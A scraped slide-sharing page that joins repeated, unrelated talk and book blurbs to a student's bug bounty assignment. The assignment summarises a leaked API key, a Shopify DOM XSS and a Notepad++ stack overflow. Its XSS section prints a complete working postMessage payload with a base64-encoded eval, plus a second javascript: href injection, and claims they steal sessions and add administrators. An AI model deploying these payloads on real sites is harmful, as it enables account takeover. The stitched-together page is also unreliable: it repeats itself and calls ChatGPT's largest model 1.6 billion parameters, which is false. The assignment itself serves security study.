WATCH WEBINAR: https://youtu.be/zTkv_9ChVPY
In recent years, large reputable companies such as Facebook, Google and Equifax have suffered major data breaches that combined exposed the personal information of hundreds of millions of people worldwide. The common vector linking these breaches – APIs. The scale and magnitude of these breaches are the reason API security has been launched into the forefront of enterprise security concerns – now forcing us to rethink the way we approach API security as a whole.
OWASP Top 10 project has for a long time been the standard list of top vulnerabilities to look for and mitigate in the world of web applications.
APIs represent a significantly different set of threats, attack vectors, and security best practices. This caused the OWASP community to launch OWASP API Security project earlier this year.
In this session we’ll discuss:
What makes API Security different from web application security
The OWASP API Security Top 10
Real world breaches and mitigation strategies for each of the risks
How to bring your app out from the dust on the web thanks to App Links and App Indexing API. How to acquire new users for you mobile app and to re-engage existing ones thanks to Google Search.
WATCH WEBINAR: https://youtu.be/zTkv_9ChVPY
In recent years, large reputable companies such as Facebook, Google and Equifax have suffered major data breaches that combined exposed the personal information of hundreds of millions of people worldwide. The common vector linking these breaches – APIs. The scale and magnitude of these breaches are the reason API security has been launched into the forefront of enterprise security concerns – now forcing us to rethink the way we approach API security as a whole.
OWASP Top 10 project has for a long time been the standard list of top vulnerabilities to look for and mitigate in the world of web applications.
APIs represent a significantly different set of threats, attack vectors, and security best practices. This caused the OWASP community to launch OWASP API Security project earlier this year.
In this session we’ll discuss:
What makes API Security different from web application security
The OWASP API Security Top 10
Real world breaches and mitigation strategies for each of the risks
How to bring your app out from the dust on the web thanks to App Links and App Indexing API. How to acquire new users for you mobile app and to re-engage existing ones thanks to Google Search.
This book is crafted for beginner coders seeking to delve into the realm of web app development using Python, specifically focusing on deploying applications with Replit.
Whether you aim to create a profitable venture or simply desire to enhance your skills in building and deploying web applications, this guide is tailored for you.
Our web application will be a straightforward yet powerful AI writer tool aimed at helping Users get special copy for their businesses based on a big Ad Men using OpenAI's API.
Buy full book here:
https://www.amazon.com/dp/B0CSPV74XK
During one of my personal projects I decided to study the internals of Android and the potential of altering the Dalvik VM (e.g. Xposed framework and Cydia) and application behaviour. Not going into detail about runtime hooking of constructors and classes like these two tools provide, I also explored the possibility of reverse engineering and modifying existing applications.
In the web you can find multiple tutorials on Android reverse engineering of applications but not many that do it with real applications that are often subject to obfuscation or with complex execution flows. So in order to learn I decided to pick a common application such as Skype and do the following:
decompile it
study contents and completely remove some functionality (e.g. ads)
change some resources (not described in presentation bellow)
recompile, sign and install.
Used tools include :
apktool – for (de)compiling android applications
jarsigner – for signing android applications
xposed – for intercepting runtime execution flow (will make public in future)
The following presentation describes the steps taken in order to completely remove the ads from skype. This includes any computation or data plan usage the ads consume. Please note the disclaimer of the presentation as this information is for educational purposes only.
Check my website : www.marioalmeida.eu
From Reversing to Exploitation: Android Application Security in EssenceSatria Ady Pradana
Seminar on Explicit's Art of Hacking
Telkom University Bandung
Bandung, 2017-11-04
Android security mostly seen as only "exploiting the device with RAT" and some of it. Here, I want to show that there are more than that.
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...idsecconf
Pembahasan ini bertujuan untuk memberikan edukasi tentang mekanisme perlindungan yang diterapkan pada aplikasi android seperti root detection, ssl pinning, anti emulation, tamper detection dan bagaimana teknik yang digunakan untuk melakukan mekanisme bypass proteksi yang diimplementasikan dengan bantuan reverse engineering menggunakan tool seperti frida, ghidra, objection, magisk, dan sebagainya.
Cloud Services are on the increase, and so is the use of Web APIs. Connecting applications, and other services, platforms and third party connections all use Web APIs extensively. This talk will focus on raising awareness of the risks associated with the use of Web APIs, trending attacks.
ChatGPT is a large language model developed by OpenAI. It is a state-of-the-art AI system that can generate human-like responses to various queries and topics. The model is based on the transformer architecture and has been trained on a massive amount of text data. ChatGPT has several models of different sizes, from the smallest one with 124 million parameters to the largest one with 1.6 billion parameters. These models can be fine-tuned for specific tasks such as language translation, text completion, question answering, and more. With its impressive capabilities, ChatGPT has become a popular tool for researchers, developers, and businesses in various industries.
Wanna learn more about ChatGPT and its benefits, “Understanding ChatGPT and Its Implications”
Seminar on November 4, 2017
Currently many things has its own app on android. Are they secure enough? What if they are not engineered with security in mind? But most importantly, can we do something to them?
Join us this month as we recap the Microsoft and 3rd Party security patches released on Patch Tuesday. We will discuss things to watch out for, products to be sure to test adequately, and which patches should be highest priority to roll out.
This book is crafted for beginner coders seeking to delve into the realm of web app development using Python, specifically focusing on deploying applications with Replit.
Whether you aim to create a profitable venture or simply desire to enhance your skills in building and deploying web applications, this guide is tailored for you.
Our web application will be a straightforward yet powerful AI writer tool aimed at helping Users get special copy for their businesses based on a big Ad Men using OpenAI's API.
Buy full book here:
https://www.amazon.com/dp/B0CSPV74XK
During one of my personal projects I decided to study the internals of Android and the potential of altering the Dalvik VM (e.g. Xposed framework and Cydia) and application behaviour. Not going into detail about runtime hooking of constructors and classes like these two tools provide, I also explored the possibility of reverse engineering and modifying existing applications.
In the web you can find multiple tutorials on Android reverse engineering of applications but not many that do it with real applications that are often subject to obfuscation or with complex execution flows. So in order to learn I decided to pick a common application such as Skype and do the following:
decompile it
study contents and completely remove some functionality (e.g. ads)
change some resources (not described in presentation bellow)
recompile, sign and install.
Used tools include :
apktool – for (de)compiling android applications
jarsigner – for signing android applications
xposed – for intercepting runtime execution flow (will make public in future)
The following presentation describes the steps taken in order to completely remove the ads from skype. This includes any computation or data plan usage the ads consume. Please note the disclaimer of the presentation as this information is for educational purposes only.
Check my website : www.marioalmeida.eu
From Reversing to Exploitation: Android Application Security in EssenceSatria Ady Pradana
Seminar on Explicit's Art of Hacking
Telkom University Bandung
Bandung, 2017-11-04
Android security mostly seen as only "exploiting the device with RAT" and some of it. Here, I want to show that there are more than that.
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...idsecconf
Pembahasan ini bertujuan untuk memberikan edukasi tentang mekanisme perlindungan yang diterapkan pada aplikasi android seperti root detection, ssl pinning, anti emulation, tamper detection dan bagaimana teknik yang digunakan untuk melakukan mekanisme bypass proteksi yang diimplementasikan dengan bantuan reverse engineering menggunakan tool seperti frida, ghidra, objection, magisk, dan sebagainya.
Cloud Services are on the increase, and so is the use of Web APIs. Connecting applications, and other services, platforms and third party connections all use Web APIs extensively. This talk will focus on raising awareness of the risks associated with the use of Web APIs, trending attacks.
ChatGPT is a large language model developed by OpenAI. It is a state-of-the-art AI system that can generate human-like responses to various queries and topics. The model is based on the transformer architecture and has been trained on a massive amount of text data. ChatGPT has several models of different sizes, from the smallest one with 124 million parameters to the largest one with 1.6 billion parameters. These models can be fine-tuned for specific tasks such as language translation, text completion, question answering, and more. With its impressive capabilities, ChatGPT has become a popular tool for researchers, developers, and businesses in various industries.
Wanna learn more about ChatGPT and its benefits, “Understanding ChatGPT and Its Implications”
Seminar on November 4, 2017
Currently many things has its own app on android. Are they secure enough? What if they are not engineered with security in mind? But most importantly, can we do something to them?
Join us this month as we recap the Microsoft and 3rd Party security patches released on Patch Tuesday. We will discuss things to watch out for, products to be sure to test adequately, and which patches should be highest priority to roll out.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
When stars align: studies in data quality, knowledge graphs, and machine lear...
Assingment 3 - Bug bounty
1. Sri Lanka Institute of Information Technology
Master of Science (Information Management) Degree Program
Information and Network Security
Assignment 3
Bug bounty
W.M.J.H. Fernando
MS18901290
2. 2
AppLovin API Key hardcoded in a Github repo
Theyfound SensitiveDataExposure ingithub/mopub-android-mediationproject,the AppLovinUIAPIkey
ishardcodedinsource code. The mainimpactis productionAPIkeythenitshouldn'tbe shownpubliclyin
Githubrepo otherwise itcan be used by otherdevelopersasit's a companypropertythe APIkeyshould
be secure as it's a monetize API key.
Thiskeyisusedfor initializationof the app, butAPIKeyshouldnotbe disclosedpubliclyinaGithubrepo.
There are 2 perspective levels.
Developer perspective
EveryAPI keyhas some certainusage limitandif otherdevelopersuse thissame keythenAPIkey usage
limit will get reduced.
Attacker perspective
Attacker can use this key to violate GDPR policy because from May 25th 2018 AppLovin compliant with
GDPR and there are certainruleswhichneedtobe followedwhile buildingthe appandif an attacker got
thiskeyhe will violate GDPRrulesandit will be a huge problem to the company. These are some links,
AppLovinGDPRpolicylink
1. https://www.applovin.com/privacy/
2. https://www.applovin.com/gdprfaqs/
Mopub GDPR PublisherIntegrationGuide
1. https://developers.mopub.com/publishers/best-practices/gdpr-guide/
3. 3
As perGoogle AppLovinSDKDocs,EUconsentand GDPR
1. https://developers.google.com/admob/android/mediation/applovin
Under the Google EU User Consent Policy, you must ensure that certain disclosures are given to, and
consentsobtainedfrom,usersinthe EuropeanEconomicArea(EEA)regardingtheuseof deviceidentifiers
andpersonal data.Thispolicyreflectsthe requirementsof the EUePrivacyDirectiveandthe GeneralData
Protection Regulation (GDPR). When seeking consent, you must identify each ad network in your
mediation chain that may collect, receive, or use personal data and provide information about each
network's use. Google currently is unable to pass the user's consent choice to such networks
automatically.
The best way committing the code to Github repo you shouldn't commit your application Key because
you neverknowwhenthingswill gowrong,the API_KEY is alwayscompany propertyand it shouldn'tbe
disclosed publicly.
4. 4
DOM XSS via Shopify.API.remoteRedirect
This problem foundadom xsson the apple-business-chatappthatseemsto be referringto a vulnerable
js file. Foruserswho have installedthisapp,justlethimuse the theme code I providedtocomplete xss.
Modify the theme code to the following payload.
<script>
function attack(){
let ctx=window.open('https://apple-business-chat-
commerce.shopifycloud.com'),interval;
let
payload=btoa(`window.opener.postMessage('success',location.origin);alert(document.dom
ain)`);
interval=setInterval(()=>{
ctx && ctx.postMessage({
"message":"Shopify.API.remoteRedirect",
"data":{
"location":`javascript:eval(atob('${payload}'))`
}
},location.origin);
},500);
window.onmessage=(e)=>{
e.data==="success"&&(
console.log('attack success'),
window.onmessage=null,
clearInterval(interval)
);
};
}
attack();
</script>
<a href="javascript:attack()" style="display:block;text-
align:center;width:100%;height:300px;line-
height:300px;background:#000;color:#fff;">click me start attack</a>
5. 5
As shown below
Then click on the store front page to trigger
Impact
Steal session information, add administrators, etc.
6. 6
Another API is also affected by xss
postMessage({
"message":"Shopify.API.Bar.initialize",
"data":{
pagination: {
next: {
href: "javascript:alert(document.domain)",
target: "new"
},
previous: {
href: "javascript:alert(document.domain)",
target: "new"
}
}
}
});
7. 7
Stack overflow in XML Parsing
Summary:
A stack bufferoverflowvulnerabilityhasbeendetectedinXMLparsingfunctionalityon Notepad++
v7.6.2 (32 bits).
That's due to the fact that _ invisibleEditView.getTextfunctiondoesn'tcheckbufferboundaries.
Description:
Vulnerabilitysrcfile:notepad-plus-plus/PowerEditor/src/Notepad_plus.cpp
Vulnerabilityline:line1008
Variable affected:charencodingStr[128];
Functionthatoverflowsbuffer:_invisibleEditView.getText
Stepsto Reproduce:
1. Create a .xml file withacorrect XML format
2. Introduce a bigXML fieldthatoverflows"encodingStr"buffer.
3. Openthe file withNotepad++andapplicationshouldcrash.
Supporting Material/References:
BoF_example1.xml->Exploitexample
Impact
An attackercouldcreate a malicious.xml filethattriggersastack bufferoverflow onvictimmachine.
You onlyneedtoopenattached.xml file examplewithNotepad++toreproduce the exploit.